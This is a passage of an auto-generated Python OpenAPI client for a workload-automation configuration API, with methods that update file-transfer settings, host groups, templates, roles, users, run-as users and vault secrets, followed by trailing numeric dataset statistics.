            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501
        if 'user' in params:
            path_params['user'] = params['user']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'run_as_user_details_data' in params:
            body_params = params['run_as_user_details_data']
        # HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/runasuser/{agent}/{user}/test', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_fts_settings(self, server, agent, fts_settings_data, **kwargs): # noqa: E501 """Update File Transfer Server (FTS) configuration data. # noqa: E501 Update File Transfer Server (FTS) configuration data. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_fts_settings(server, agent, fts_settings_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param FtsSettingsData fts_settings_data: File Transfer Server (FTS) configuration data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_fts_settings_with_http_info(server, agent, fts_settings_data, **kwargs) # noqa: E501 else: (data) = self.update_fts_settings_with_http_info(server, agent, fts_settings_data, **kwargs) # noqa: E501 return data def update_fts_settings_with_http_info(self, server, agent, fts_settings_data, **kwargs): # noqa: E501 """Update File Transfer Server (FTS) configuration data. # noqa: E501 Update File Transfer Server (FTS) configuration data. 
# noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_fts_settings_with_http_info(server, agent, fts_settings_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param FtsSettingsData fts_settings_data: File Transfer Server (FTS) configuration data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'fts_settings_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_fts_settings" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_fts_settings`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `update_fts_settings`") # noqa: E501 # verify the required parameter 'fts_settings_data' is set if self.api_client.client_side_validation and ('fts_settings_data' not in params or params['fts_settings_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `fts_settings_data` when calling `update_fts_settings`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: 
path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'fts_settings_data' in params: body_params = params['fts_settings_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json', 'text/plain']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/fts/settings', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_hosts_in_hostgroup(self, server, hostgroup, host_group_member_params_list, **kwargs): # noqa: E501 """update agents in hostgroup. # noqa: E501 update agents in hostgroup. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_hosts_in_hostgroup(server, hostgroup, host_group_member_params_list, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str hostgroup: The hostgroup name (required) :param HostgroupProperties host_group_member_params_list: Agent list to update in a hostgroup (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_hosts_in_hostgroup_with_http_info(server, hostgroup, host_group_member_params_list, **kwargs) # noqa: E501 else: (data) = self.update_hosts_in_hostgroup_with_http_info(server, hostgroup, host_group_member_params_list, **kwargs) # noqa: E501 return data def update_hosts_in_hostgroup_with_http_info(self, server, hostgroup, host_group_member_params_list, **kwargs): # noqa: E501 """update agents in hostgroup. # noqa: E501 update agents in hostgroup. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_hosts_in_hostgroup_with_http_info(server, hostgroup, host_group_member_params_list, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str hostgroup: The hostgroup name (required) :param HostgroupProperties host_group_member_params_list: Agent list to update in a hostgroup (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'hostgroup', 'host_group_member_params_list'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_hosts_in_hostgroup" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_hosts_in_hostgroup`") # noqa: E501 # verify the required parameter 'hostgroup' is set if self.api_client.client_side_validation and ('hostgroup' not in params or params['hostgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `hostgroup` when calling `update_hosts_in_hostgroup`") # noqa: E501 # verify the required parameter 'host_group_member_params_list' is set if self.api_client.client_side_validation and ('host_group_member_params_list' not in params or params['host_group_member_params_list'] is None): # noqa: E501 raise ValueError("Missing the required parameter `host_group_member_params_list` when calling `update_hosts_in_hostgroup`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'hostgroup' in params: path_params['hostgroup'] = params['hostgroup'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'host_group_member_params_list' in params: body_params = params['host_group_member_params_list'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 
return self.api_client.call_api( '/config/server/{server}/hostgroup/{hostgroup}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_mft_configuration(self, server, agent, mft_configuration_data, **kwargs): # noqa: E501 """Update MFT Configuration # noqa: E501 Update MFT Configuration # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_mft_configuration(server, agent, mft_configuration_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param MftConfigurationData mft_configuration_data: MFT Configuration Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_mft_configuration_with_http_info(server, agent, mft_configuration_data, **kwargs) # noqa: E501 else: (data) = self.update_mft_configuration_with_http_info(server, agent, mft_configuration_data, **kwargs) # noqa: E501 return data def update_mft_configuration_with_http_info(self, server, agent, mft_configuration_data, **kwargs): # noqa: E501 """Update MFT Configuration # noqa: E501 Update MFT Configuration # noqa: E501 This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_mft_configuration_with_http_info(server, agent, mft_configuration_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param MftConfigurationData mft_configuration_data: MFT Configuration Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'mft_configuration_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_mft_configuration" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_mft_configuration`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `update_mft_configuration`") # noqa: E501 # verify the required parameter 'mft_configuration_data' is set if self.api_client.client_side_validation and ('mft_configuration_data' not in params or params['mft_configuration_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `mft_configuration_data` when calling `update_mft_configuration`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = 
params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'mft_configuration_data' in params: body_params = params['mft_configuration_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/configuration', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_pgp_template(self, server, agent, template_name, pgp_template_data, **kwargs): # noqa: E501 """Update PGP Template # noqa: E501 Update PGP Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_pgp_template(server, agent, template_name, pgp_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The PGP Template Name (required) :param PgpTemplateData pgp_template_data: PGP Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, **kwargs) # noqa: E501 else: (data) = self.update_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, **kwargs) # noqa: E501 return data def update_pgp_template_with_http_info(self, server, agent, template_name, pgp_template_data, **kwargs): # noqa: E501 """Update PGP Template # noqa: E501 Update PGP Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The PGP Template Name (required) :param PgpTemplateData pgp_template_data: PGP Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'agent', 'template_name', 'pgp_template_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_pgp_template" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_pgp_template`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `update_pgp_template`") # noqa: E501 # verify the required parameter 'template_name' is set if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `template_name` when calling `update_pgp_template`") # noqa: E501 # verify the required parameter 'pgp_template_data' is set if self.api_client.client_side_validation and ('pgp_template_data' not in params or params['pgp_template_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `pgp_template_data` when calling `update_pgp_template`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'template_name' in params: path_params['templateName'] = params['template_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None 
if 'pgp_template_data' in params: body_params = params['pgp_template_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_role(self, role, role_file, **kwargs): # noqa: E501 """Update Authorization Role # noqa: E501 Update Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_role(role, role_file, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :param file role_file: File with contenet of Role Data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_role_with_http_info(role, role_file, **kwargs) # noqa: E501 else: (data) = self.update_role_with_http_info(role, role_file, **kwargs) # noqa: E501 return data def update_role_with_http_info(self, role, role_file, **kwargs): # noqa: E501 """Update Authorization Role # noqa: E501 Update Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_role_with_http_info(role, role_file, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :param file role_file: File with contenet of Role Data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['role', 'role_file'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_role" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `update_role`") # noqa: E501 # verify the required parameter 'role_file' is set if self.api_client.client_side_validation and ('role_file' not in params or params['role_file'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role_file` when calling `update_role`") # noqa: E501 collection_formats = {} path_params = {} if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} if 'role_file' in params: local_var_files['roleFile'] = params['role_file'] # noqa: E501 body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['multipart/form-data']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return 
self.api_client.call_api( '/config/authorization/role/{role}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_run_as_user(self, server, agent, user, run_as_user_details_data, **kwargs): # noqa: E501 """Update Run-as user # noqa: E501 Update Run-as user details in server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_run_as_user(server, agent, user, run_as_user_details_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :param RunAsUserDetailsData run_as_user_details_data: Run as user details data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_run_as_user_with_http_info(server, agent, user, run_as_user_details_data, **kwargs) # noqa: E501 else: (data) = self.update_run_as_user_with_http_info(server, agent, user, run_as_user_details_data, **kwargs) # noqa: E501 return data def update_run_as_user_with_http_info(self, server, agent, user, run_as_user_details_data, **kwargs): # noqa: E501 """Update Run-as user # noqa: E501 Update Run-as user details in server. # noqa: E501 This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_run_as_user_with_http_info(server, agent, user, run_as_user_details_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :param RunAsUserDetailsData run_as_user_details_data: Run as user details data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'user', 'run_as_user_details_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_run_as_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_run_as_user`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `update_run_as_user`") # noqa: E501 # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `update_run_as_user`") # noqa: E501 # verify the required parameter 'run_as_user_details_data' is set if self.api_client.client_side_validation and ('run_as_user_details_data' not in params or params['run_as_user_details_data'] is None): # noqa: 
E501 raise ValueError("Missing the required parameter `run_as_user_details_data` when calling `update_run_as_user`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'run_as_user_details_data' in params: body_params = params['run_as_user_details_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/runasuser/{agent}/{user}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_secret(self, name, **kwargs): # noqa: E501 """Update an existing secret # noqa: E501 Update an existing secret in the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_secret(name, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the secret to update (required) :param SecretValue value: The new value for the secret :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_secret_with_http_info(name, **kwargs) # noqa: E501 else: (data) = self.update_secret_with_http_info(name, **kwargs) # noqa: E501 return data def update_secret_with_http_info(self, name, **kwargs): # noqa: E501 """Update an existing secret # noqa: E501 Update an existing secret in the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_secret_with_http_info(name, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the secret to update (required) :param SecretValue value: The new value for the secret :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['name', 'value'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_secret" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name' is set if self.api_client.client_side_validation and ('name' not in params or params['name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `name` when calling `update_secret`") # noqa: E501 collection_formats = {} path_params = {} if 'name' in params: path_params['name'] = params['name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'value' in params: body_params = params['value'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return 
self.api_client.call_api( '/config/secret/{name}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_user(self, user, user_file, **kwargs): # noqa: E501 """Update user # noqa: E501 Update user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_user(user, user_file, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. (required) :param file user_file: File with contenet of user data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_user_with_http_info(user, user_file, **kwargs) # noqa: E501 else: (data) = self.update_user_with_http_info(user, user_file, **kwargs) # noqa: E501 return data def update_user_with_http_info(self, user, user_file, **kwargs): # noqa: E501 """Update user # noqa: E501 Update user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_user_with_http_info(user, user_file, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. (required) :param file user_file: File with contenet of user data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['user', 'user_file'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `update_user`") # noqa: E501 # verify the required parameter 'user_file' is set if self.api_client.client_side_validation and ('user_file' not in params or params['user_file'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user_file` when calling `update_user`") # noqa: E501 collection_formats = {} path_params = {} if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} if 'user_file' in params: local_var_files['userFile'] = params['user_file'] # noqa: E501 body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['multipart/form-data']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/user/{user}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', 
True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_zos_template(self, server, agent, template_name, zos_template_data, **kwargs): # noqa: E501 """Update z/OS Template # noqa: E501 Update z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_zos_template(server, agent, template_name, zos_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :param ZosTemplateData zos_template_data: z/OS Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_zos_template_with_http_info(server, agent, template_name, zos_template_data, **kwargs) # noqa: E501 else: (data) = self.update_zos_template_with_http_info(server, agent, template_name, zos_template_data, **kwargs) # noqa: E501 return data def update_zos_template_with_http_info(self, server, agent, template_name, zos_template_data, **kwargs): # noqa: E501 """Update z/OS Template # noqa: E501 Update z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_zos_template_with_http_info(server, agent, template_name, zos_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :param ZosTemplateData zos_template_data: z/OS Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'agent', 'template_name', 'zos_template_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_zos_template" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_zos_template`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `update_zos_template`") # noqa: E501 # verify the required parameter 'template_name' is set if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `template_name` when calling `update_zos_template`") # noqa: E501 # verify the required parameter 'zos_template_data' is set if self.api_client.client_side_validation and ('zos_template_data' not in params or params['zos_template_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `zos_template_data` when calling `update_zos_template`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'template_name' in params: path_params['templateName'] = params['template_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None 
if 'zos_template_data' in params: body_params = params['zos_template_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats)
43.129782
198
0.60602
31,975
278,489
5.041376
0.010852
0.054839
0.021539
0.027693
0.984615
0.978467
0.972165
0.966327
0.960862
0.95691
0
0.017248
0.305685
278,489
6,456
199
43.136462
0.816424
0.318953
0
0.809122
1
0
0.198423
0.051965
0
0
0
0
0
1
0.035191
false
0
0.003097
0
0.090935
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
e805fe377f1f66c13a7265953392f9d531f467da
21,942
py
Python
test/test_clients_api.py
fattureincloud/fattureincloud-python-sdk
f3a40fac345751014ea389680efdaef90f03bac1
[ "MIT" ]
2
2022-02-17T08:33:17.000Z
2022-03-22T09:27:00.000Z
test/test_clients_api.py
fattureincloud/fattureincloud-python-sdk
f3a40fac345751014ea389680efdaef90f03bac1
[ "MIT" ]
null
null
null
test/test_clients_api.py
fattureincloud/fattureincloud-python-sdk
f3a40fac345751014ea389680efdaef90f03bac1
[ "MIT" ]
null
null
null
